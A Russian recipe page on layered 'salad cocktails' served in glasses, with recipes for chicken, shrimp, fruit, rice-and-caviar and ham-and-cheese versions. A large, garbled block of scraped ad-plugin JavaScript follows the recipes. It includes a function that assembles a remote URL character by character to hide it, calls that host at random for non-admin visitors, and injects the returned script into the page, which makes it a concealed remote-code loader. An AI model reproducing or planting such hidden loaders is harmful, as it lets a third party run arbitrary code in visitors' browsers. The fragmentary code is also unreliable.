Салат коктейль рецепт

Салат коктейль рецепт

  • Комментариев: 1
  • Дата: 25.11.2015
  • Просмотров: 13 674

Предлагаю приготовить вкусный и красивый салат-коктейль из морепродуктов. Морепродукты очень деликатный продукт, который очень хорошо сочетается с фруктами. Сегодня давайте приготовим блюдо, которое достойно может занимать на праздничном столе.

  • Комментариев: 0
  • Дата: 21.05.2015
  • Просмотров: 9 174

  • Комментариев: 0
  • Дата: 30.11.2014
  • Просмотров: 16 842

  • Комментариев: 0
  • Дата: 10.10.2014
  • Просмотров: 11 841

Чтобы порадовать своих гостей необычным и вкусным блюдом, приготовьте к праздничному столу салат с авакадо, рецепт которого достаточно прост и доступен сегодня любому. Ведь авакадо давно перестали относить к экзотическим фруктам, сегодня его легко можно приобрести в любом супер-маркете, практически круглый год.

  • Комментариев: 0
  • Дата: 06.10.2014
  • Просмотров: 13 417

  • Комментариев: 0
  • Дата: 26.01.2014
  • Просмотров: 8 847

  • Комментариев: 0
  • Дата: 15.01.2014
  • Просмотров: 17 069

  • Комментариев: 0
  • Дата: 25.10.2013
  • Просмотров: 8 689

  • Комментариев: 0
  • Дата: 30.09.2013
  • Просмотров: 11 188

Если вы не являетесь ярым противником крабовых палочек и майонеза, обязательно приготовьте этот салат. Благодаря помидорам он очень сочный и свежий, чеснок придает остроту и аромат, а оливки, маслины и укроп прекрасно дополняют вкус. Как и любой салат со свежими овощами, его следует заправлять майонезом непосредственно перед подачей. Кстати такой салат выручит вас в ситуации с неожиданными гостями, готовится он очень просто и быстро.

  • Комментариев: 0
  • Дата: 07.07.2013
  • Просмотров: 16 068

Морская капуста очень полезна для здоровья. Она является профилактикой многих заболеваний, поэтому ее нужно включать в свой рацион. Например, можно сделать салат. В салат из морской капусты можно положить оливки и маслины и они лишь дополнят вкус и сделают салат лучше. А соленый огурец добавить изюминку. Рассмотрим, как приготовить салат.

  • Комментариев: 0
  • Дата: 29.01.2013
  • Просмотров: 13 653

Пенне или, проще говоря, перья с добавками из томатов и шпината – очень вкусная основа не только для вторых блюд, но и для салатов. Французский салат с овощными пенне, креветками и авокадо, возможно, для русской кухни, несколько непривычен, однако, попробовать стоит хотя бы для расширения своих вкусовых представлений. Непременные ингредиенты во францзских салатах – это салатная зелень, которая может быть дополнена любыми другими сочетающимися между собой продуктами, даже если они занимают основную массу.

  • Комментариев: 0
  • Дата: 05.01.2013
  • Просмотров: 6 487

Салат с овощами и твердым сыром – вкусное холодное блюдо, закуска, которая украсит любой торжественный стол.

  • Комментариев: 3
  • Дата: 18.12.2012
  • Просмотров: 21 106

Легкий, праздничный салат, который понравится любому, даже самому привередливому гостю — он не только очень вкусный, полезный, но и малокалорийный, а значит идеально подходит в качестве одного из центральных блюд.

  • Комментариев: 1
  • Дата: 30.10.2012
  • Просмотров: 14 468

Салат из мидий с огурцом и лимоном – ингредиенты:

Мидии замороженные – 250-300 гр.

Свежий огурец – 1 шт.

Маслины без косточек

Молотый перец черный

  • Комментариев: 0
  • Дата: 28.10.2012
  • Просмотров: 13 060

Раздел «Салаты-Коктейли» предлагает вашему вниманию великое множество различных интересных рецептов необычных салатов, особенностью приготовления которых является декоративное, многослойное распределение измельченных ингредиентов блюда в специальных порционных бокалах или стаканах, которые затем пропитываются специально приготовленной заправкой, майонезом или растительным маслом.

По внешнему виду при подаче на стол такие салаты напоминают скорей сборные алкогольные или безалкогольные напитки, нежели холодную закуску, в результате чего они и получили свое необычное название. Изначально подобные салаты были исключительно частью фуршетного стола, но сегодня таким закусочным блюдам отдают предпочтение многие рестораны и кафе, в меню которых вы можете запросто найти салат из морепродуктов – морской коктейль или салат-коктейль с ветчиной.

Проявляют к таким необычным салатам интерес и домохозяйки, все чаще и чаще готовя их к различным застольям, благодаря чему салат-коктейль из морепродуктов давно стал привычным домашним угощением.

Чтобы качественно и правильно приготовить любой салат-коктейль, рецепт его обязательно включает в себя подробное описание всего процесса приготовления, в котором очень важна последовательность наполнения порционного бокала каждым видом ингредиентов, в результате чего салат приобретает желаемый вкус.

Однако существуют варианты, когда подготовленные ингредиенты салата-коктейля, перед тем как наполнить порционный бокал, тщательно перемешивают между собой и заправляют приготовленным соусом, к примеру, именно так готовится салат морской коктейль. Поэтому каждый представленный в разделе салат – коктейль с фото также имеет пошаговое описание, благодаря которому вы всегда можете приготовить вкусное и правильное блюдо.

Как сделать салат-коктейль: 3 простых рецепта

Салат-коктейль часто можно увидеть в меню какого-нибудь ресторана или кафе, а также на праздничном столе тех, кто уже пробовал его и знает, что это такое. А тот, кто еще не успел познакомиться с этим вкусным блюдом, будут рады узнать, где он возник, правила его подачи и интересные рецепты.

Что такое салат-коктейль

Салат, к названию которого приписывают слово «коктейль» как ни странно появился уже много лет назад. В отдельных источниках утверждается, что европейцы делали его еще в 80-х годах прошлого столетия. Но точных данных о том, кто стал его автором, нет.

Салаты-коктейли отличаются от обычных тем, что их подают в бокалах, фужерах или в креманках. При этом их особенностью есть то, что в большинстве случаев их делают послойно, поливая каждый слой заправкой. По правилам этикета, кушать его можно либо с бокала, либо перекладывать на мелкую тарелку. В первом случае салат должен подаваться в бокале вместе с чайной ложкой, которая имеет длинную ручку, во втором случае его подают вместе с плоской тарелкой, рядом с которой кладут вилку.

По составу эти салаты можно условно разделить на закусочные и десертные, а также те, что состоят из морепродуктов. В закусочных главными составляющими выступают грибы, сыр, овощи, курица, ветчина и прочие продукты. В десертных это, конечно же, фрукты и свежие ягоды. А в качестве морепродуктов чаще всего можно увидеть креветок, лосося, крабов.

После того, как мы разобрались, о чем идет речь, теперь можно рассказать и о том, как сделать салат-коктейль. А рецептов его приготовления есть очень много, поэтому приведем примеры приготовления трех разных видов этих блюд.

Салат-коктейль «Цыпленок под ореховой шубой»

Ингредиенты: 280 грамм куриного филе, 2 яйца, 1 огурец, 70 грамм чернослива, 50 грамм грецких орехов и две щепотки соли. Для заправки — 8 ст.л. майонеза. Из посуды тут следует использовать креманки.

Как готовить: 1. Куриное филе отварить в чуть подсоленной воде, остудить и порезать мелкими кубиками.

2. Яйца также отварить, когда остынут измельчить любым способом (порезать или потереть на терке).

3. Чернослив промыть, залить кипятком. Через пару минут, когда он размякнет, слить воду и порезать на маленькие кусочки.

4. Огурец нарезать тонкими ломтиками в виде соломки.

5. Грецкие орехи немного потолочь, но так, чтобы получись довольно крупные кусочки.

6. В подготовленные креманки первым слоем выложить яйца, вторым слоем – курицу, третьим – измельченный огурец, четвертым – чернослив, после него – орехи. Каждый слой, кроме верхнего, щедро смазать майонезом.

Вот и все, легкий закусочный салат-коктейль готов. Для украшения можно использовать кусочек огурца (сделав из него цветок) и листья петрушки. Перед подачей на стол выдержать в холодильнике в течение 30-ти минут, чтобы блюдо успело хорошо пропитаться майонезом.

Салат-коктейль с креветками

Ингредиенты: 300 грамм вареных креветок, 500 грамм пекинской капусты, 4 яйца. Для заправки — 100 грамм оливкового майонеза и 200 грамм сыра фета. Из посуды подготовить крупные бокалы.

Как готовить: 1. Креветки очистить и отварить. Нарезать крупными кусочками.

2. Яйца отварить и потереть на мелкую терку.

3. Капусту мелко нашинковать.

4. Растереть сыр фету с майонезом.

4. Все продукты выложить в миску, добавить заправку и перемешать. Разложить салат по бокалам.

5. Для красоты сверху положить по одной большой креветке в каждый бокал.

Этот вид приготовления салата, когда все продукты смешиваются, встречается довольно редко, но все же имеет право на существование.

Салат-коктейль из фруктов

Ингредиенты: подготовить по 50 грамм кураги, чернослива, груш и яблок, 60 грамм миндаля. Для заправки использовать: 150 грамм ликера, 150 грамм сахара, по 3 ст.л. сока лимона и апельсина, 2 стакана воды, цедру апельсина и лимона. Из посуды необходимо подготовить фужеры на высоких ножках.

Как готовить: 1. Все фрукты помыть и нарезать мелкими кубиками.

2. Приготовление заправки: сначала срезать цедру с лимона и апельсина, положить ее в кастрюлю. Залить водой и ликером, всыпать сахар. Поставить на газ, довести до кипения.

3. В горячую заправку положить фрукты, остудить и поставить в холодильник на 12 часов.

4. Спустя указанное время, влить во фруктовый салат сок апельсина и лимона. Перемешать и выложить в фужеры. Посыпать сверху измельченным миндалем и подавать к столу.

Подобные салаты можно готовить как на каждый день, так и на праздник. При желании таким образом можно готовить и самые обычные блюда (как, например, салат «Оливье»), поданные по-новому они будут казаться вкуснее и аппетитнее.

Вкусный салат коктейль рецепт с фото

Добрый день! Сегодня Алина Станиславовна предлагает красивый вкусный рецепт салата-коктейля пошагово с фото.

Термин «салат-коктейль» появился сравнительно недавно. По сути это обычный салат, но из мелко нарезанных ингредиентов. Салат-коктейль выкладывают в стеклянную посуду слоями, а сверху украшают зеленью и овощами, входящими в его состав.

Нарезка всех продуктов должна быть одинаковой, тогда салат будет выглядеть более аппетитно.
Его подают в порционных прозрачных креманках, бокалах, красивых стаканах. Едят его из этой же посуды небольшой ложечкой или выкладывают на тарелку.

Салат-коктейль готовят незадолго до подачи, чтобы овощи не пустили сок, а салат не стал водянистым. Заправляют салат-коктейль майонезом, сметаной, растительным маслом.

Если вы собираетесь красиво оформлять блюдо, то заправку к нему можно подать отдельно, чтобы перемешать её с салатом непосредственно перед едой. Также можно заранее покрыть каждый слой продуктов сеточкой из майонеза, стараясь не задевать стенок посуды, чтобы не испортить внешний вид салата.

Ингредиенты для салата:

  • • свежие огурцы – 2 шт.;
    • морковь средняя – 1 шт.;
    • яйца – 2 шт.;
    • варёный рассыпчатый рис – 1 чашка (объёмом 150 г);
    • небольшая луковица – 1 шт.;
    • икра красная – 50 г;
    • зелень для украшения;
    • майонез – 140 г.

Приготовление салата коктейля:

  1. Морковь почистите, вымойте, отварите до полуготовности. Она не должна получиться слишком мягкой, иначе при шинковке может превратиться в кашу. Немного остудите под струёй холодной воды, уберите на полчаса в холодильник. Сварите вкрутую яйца, измельчите ножом или вилкой.
  2. Мелко порежьте луковицу.
  3. Огурцы натрите на средней тёрке или нарежьте тоненькой соломкой.
  4. На такой же тёрке натрите и остывшую морковь.
  5. Подготовьте рис. Он должен быть обязательно холодным, поэтому его нужно сварить заранее.
  6. Поставьте на стол посуду, выбранную для салата. Если ёмкости небольшие, то из данного количества ингредиентов у вас получится четыре порции. На дно бокала уложите рис, примните его ложкой.
  7. Посыпьте луком. Смажьте тонким слоем майонеза, как и каждый последующий ряд продуктов. Затем положите морковку, которую тоже немного примните.
  8. Покройте её измельчёнными огурцами.
  9. Верхним слоем выложите яйца.
  10. Смажьте их майонезом, слегка перемешав, стараясь не нарушить остальные слои.

Украсить салат можно икрой, как подскажет фантазия, используя также зелень и овощи.
Таким образом, вкусный салат-коктейль с огурцом, рисом, яйцом и морковью готов! Приятного аппетита!

Уважаемые читатели, пожалуйста, поделитесь своим мнением, опытом, наблюдениями в комментариях, а также отправьте ссылку на статью своим друзьям в социальных сетях. СПАСИБО.
Хорошего вам дня и УДАЧИ во всех начинаниях.

Салат коктейль с ветчиной, рецепты с фото

В этом обзоре речь пойдет о пище не только питательной, но и эстетической. Будем готовить салат коктейль с ветчиной и сервировать его в красивые креманки, которые без преувеличения станут украшением любого праздничного стола. Необычность этого рецепта еще и в том, что мы привыкли подавать салаты в крупных вазах или мисках, реже в корзинках из песочного теста, а вот раскладывать их по креманкам – это скорее европейская практика. Есть мнение, что подобная традиция напрямую связана с таким понятием как “фуршет” где все угощения подают порционно: бутерброды небольшого размера, канапе, закуски на шпажках и салаты в небольших креманках или бокалах.

В этом разнообразии удивительный салат коктейль с ветчиной и сыром будет как нельзя кстати ведь он и вкусный, и красивый в чем Вы сможете очень скоро убедится, а пока немного об истории и пользе подобных угощений.

История блюда

История происхождения салата коктейля куда входит ветчина и сыр не слишком оригинальна – он придуман для красоты. В основном в таком исполнении он мало чем отличается от вполне традиционного обыкновенного салата-собрата, кроме разве что способа подачи. Коктейль сервируют в бокалы или креманки на ножке, именно отсюда и необычное название блюда. Салат коктейль может быть двух видов: закусочный или десертный. Очевидно, что десертные варианты включают фрукты и различные сиропы, а закусочные могут быть мясными, рыбными или овощными. Наш рецепт касается закусочного варианта – это салат коктейль с ветчиной с добавлением сыра, свежих овощей и вкусного, ароматного, а главное по возможности домашнего, майонеза.

Однако, чтобы не нарушать традиций и приготовить правильный закусочный коктейль-салат предлагаем Вам несколько важных и нужных правил:

  • Все ингредиенты выкладываются только слоями, которые перемешать можно только непосредственно перед употреблением;
  • Все продукты для салата нарезаются одинаково: соломкой, кубиками и т.д.
  • Независимо от того какой именно соус Вы намерены использовать его выкладывают небольшой горкой прямо на салат;
  • Подают такой салат всегда в стеклянной посуде: креманках, бокалах, фужерах.
  • В качестве прибора для коктейльного салатика использую десертную ложечку небольшого размера.

Польза блюда

Чем может быть полезен салат коктейль с ветчиной и сыром и его рецепт? Ну прежде всего тем, что в его составе есть свежие овощи. Они важны не только непосредственно витаминным и минеральным составом, но и наличием клетчатки, которая ой как нужна организму. А еще в таком салате есть перепелиные яйца о пользе которых даже говорить не приходится. В них присутствует все то же самое что и в куриных, только в куда более высокой концентрации: тут и витамины, и фосфор, и незаменимые аминокислоты, и лизин.

Короче, все что можно пожелать в одном небольшом по размеру продукте. Вы можете возразить, что всю пользублюда нивелирует майонез. Только не тогда когда он домашний! Мы приготовим свой их высококачественного оливкового масла первого отжима, свежих желтков, лимонного сока и нежной горчицы. Просто вкуснятина, поверьте мне на слово! Не станем откладывать и приступим немедленно к приготовлению салат коктейля с ветчиной – вот наш рецепт с фото. Салат коктейль с ветчиной и сыром станет идеальным закусочным вариантом к празднику.

Потребуется

  • Ветчина (в нарезке) – 200-400 грамм;
  • Сыр твердых сортов – 100-200 грамм;
  • Свежий огурец – 1 крупный;
  • Болгарский перец сладкий – на вкус хозяйки;
  • Перепелиные (куриные яйца) – на вкус хозяйки;
  • Зеленый лук – 1 пучок;
  • Высококалорийный майонез – для заправки;
  • Листовой салат – на вкус хозяйки;
  • Соль – на вкус хозяйки.

Рецепт салата коктейль с ветчиной

  1. Подготовим необходимые продукты;

Заготовим нужные для приготовления салата продукты

Формируем из ветчины брусочки или соломку

Огурцы нарезаем соломкой или брусочками

Раскладываем нарезку в креманки, салатники или бокалы

Нарезаем репчатый лук

Посыпаем измельченным луком ветчину и сыр

Потрем твердый сыр на крупной терке

Обильно посыпаем сыром имеющиеся в салатниках ингредиенты

Добавляем листовой салат

Отварные перепелиные яички поделим на четыре части. Болгарский перец нарезаем соломкой

Выкладываем яйца и перец в салатник

Ветчину скручиваем розочками и добавляем в салат в качестве украшения. Сюда же пойдет дополнительная порция зеленого лука и тертого сыры

Заправляем салат домашним майонезом. Отправляем в холодильник для легкого охлаждения и насыщения

Рецепт салата коктейль с ветчиной подошел к завершению. Его останется лишь перемешать и приправить солью, но это уже гости сделают сами

Вот так быстро и просто можно украсить любой праздничный стол! Не правда ли отличная идея? Если в вашем секретном арсенале есть не менее удачные варианты, ждем с нетерпением. Делитесь своим опытом с ХозОбоз – с нами интересно!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};